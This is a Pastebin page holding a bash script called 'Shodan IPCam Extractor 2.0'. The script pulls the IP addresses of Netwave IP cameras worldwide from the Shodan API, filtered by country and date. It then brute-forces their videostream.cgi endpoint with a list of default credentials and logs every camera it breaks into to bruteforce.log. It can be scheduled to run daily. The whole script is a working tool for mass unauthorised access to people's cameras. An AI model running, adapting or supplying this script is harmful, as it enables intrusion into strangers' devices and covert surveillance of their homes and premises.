theunknownwatcher

Shodan IPCam Extractor 2.0

Mar 30th, 2018
186
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. #
  3. # Shodan IPCam Extractor 2.0 by Arsouill3 @ 8ch.net/ipcam/
  4. #
  5. # Last update : 31/10/2015
  6. #
  7. # Shodan IPCam Extractor 2.0 allows you to download IP (of IPCam) from Shodan.io, thanks to its API, and to test default credentials. Then all exploitable IPCam are saved in bruteforce.log.
  8. # For that purpose, you'll need to subscribe either Developer or Freelancer plan (https://developer.shodan.io/billing/signup).
  9. # cURL (http://curl.haxx.se/download.html) and jq (https://stedolan.github.io/jq/download/) are required.
  10. # The script has been written to get all IP (of IPCam) all over the world on a daily basis. If you want to do so, then edit crontab (crontab -e) as follow : * 20 * * * PATH/shodan_ipcam_extractor.sh $country_iso_2letters $date (script will be launched #everyday at 8 p.m.)
  11. # A sample of credentials.txt here : http://pastebin.com/NmQQ6w37
  12. #
  13. # ./shodan_ipcam_extractor.sh $country_iso_2letters $date :
  14. #   * $country_iso_2letters : Alpha-2 code of a country (https://www.iso.org/obp/ui/#search) | all
  15. #   * $date : all | y (stands for yesterday)
  16.  
  17. api_key="" # Paste your Shodan's API key here
  18. country=$1
  19. date=$2
  20. today=$(date +'%s')
  21. shodan_today=$(date --date="@$today" "+%d/%m/%Y")
  22. yesterday=$(($today-24*3600))
  23. bfyesterday=$(($yesterday-24*3600))
  24. shodan_bfyesterday=$(date --date="@$bfyesterday" "+%d/%m/%Y")
  25. query1="netwave ip camera country:$country before:$shodan_today after:$shodan_bfyesterday" # Download all IPCam of $country posted on yesterday ; $country!=all and $date=y
  26. query2="netwave ip camera country:$country" # Download all IPCam of $country ; $country!=all and $date=all
  27. query3="netwave ip camera" # Download all IPCam ; $country=all and $date=all
  28. query4="netwave ip camera before:$shodan_today after:$shodan_bfyesterday" # Download all IPCam posted yesterday ; $country=all and $date=y
  29.  
  30. if [ ! -d "./JSON_files" ]
  31. then
  32.     mkdir "./JSON_files"
  33. fi
  34. if [ ! -f "./shodan_ip.txt" ]
  35. then
  36.     touch "./shodan_ip.txt"
  37. fi
  38.  
  39. function collect_ip { # collect_ip $api_key $query
  40. i=1
  41. nbr_ip=1
  42. while [ "$nbr_ip" -gt "0" ]
  43. do
  44.     code_status=$(curl -L -w "%{http_code}" "https://api.shodan.io/shodan/host/search?key=$1&query=$2&page=$i" -o ./JSON_files/shodan_$i.json)
  45.     if [ "$code_status" -ne "200" ]
  46.     then
  47.         echo "Error ! Maybe a lack of credit ? $(date "+%c")" >> ./error_shodan.log
  48.         nbr_ip=0
  49.         i=$(($i+1))
  50.     else
  51.         nbr_ip=$(jq '.matches | length' < ./JSON_files/shodan_$i.json)
  52.         i=$(($i+1))
  53.     fi
  54. done
  55. i=$(($i-1))
  56. rm "./JSON_files/shodan_$i.json"
  57. }
  58.  
  59. function extract_ip {
  60. nbr_files=$(ls ./JSON_files/ | wc -l)
  61. if [ "$nbr_files" -gt "0" ]
  62. then
  63.     for (( j=1; $j<=$nbr_files; j++ ))
  64.     do
  65.         nbr_ip=$(jq '.matches | length' < ./JSON_files/shodan_$j.json)
  66.         for (( i=0; $i<=$nbr_ip-1; i++ ))
  67.         do
  68.             ip=$(jq --raw-output .matches[$i].ip_str < ./JSON_files/shodan_$j.json)
  69.             printf "%s\n" "$ip" >> ./shodan_ip.txt
  70.         done
  71.     rm "./JSON_files/shodan_$j.json"
  72.     echo "File $j processed."
  73.     done
  74. else
  75.     echo "JSON_files directory is empty !"
  76.     exit
  77. fi
  78.  
  79. # Split shodan_ip.txt into files of 4000 lines max each
  80. nbr_line_ip=$(wc -l ./shodan_ip.txt | sed 's/^\(.*\) \..*/\1/')
  81. split=$(($nbr_line_ip/4000)) # 4000 is nearly the max quantity of IP to prevent Joe's FileDownloader of crashing...
  82. for (( i=1; $i<=$split; i++ ))
  83. do
  84.     j=$((4000*$i-3999))
  85.     k=$((4000*$i))
  86.     sed -n -e $j,$k'p' ./shodan_ip.txt > ./shodan_ip_$i.txt
  87. done
  88. sed -n -e $(($k+1)),'$p' ./shodan_ip.txt > ./shodan_ip_$i.txt
  89. }
  90.  
  91. # Beginning of "main"
  92. if [ "$country" = "all" ]
  93. then
  94.     if [ "$date" = "all" ]
  95.     then
  96.         collect_ip $api_key $query3
  97.         extract_ip
  98.     else
  99.         collect_ip $api_key $query4
  100.         extract_ip
  101.     fi
  102. else
  103.     if [ "$date" = "y" ]
  104.     then
  105.         collect_ip $api_key $query1
  106.         extract_ip
  107.     else
  108.         collect_ip $api_key $query2
  109.         extract_ip
  110.     fi 
  111. fi
  112.  
  113. # Try all credentials of crendentials.txt. They should imperatively be of the form admin:psw (no spaces, one per line). A sample here : http://pastebin.com/NmQQ6w37
  114. while read ip
  115. do
  116.     while read credential
  117.     do
  118.         admin=$(echo $credential | sed 's/^\(.*\):.*$/\1/')
  119.         psw=$(echo $credential | sed 's/^.*:\(.*\)$/\1/')
  120.         code_status=$(curl -sL -m 10 -w "%{http_code}" "http://$ip/videostream.cgi?user=$admin&pwd=$psw" -o /dev/null)
  121.         if [ "$code_status" = "200" ]
  122.         then
  123.             echo "http://$ip/ - $admin:$psw" >> ./bruteforce.log
  124.         fi
  125.     done < ./credentials.txt
  126. done < ./shodan_ip.txt
RAW Paste Data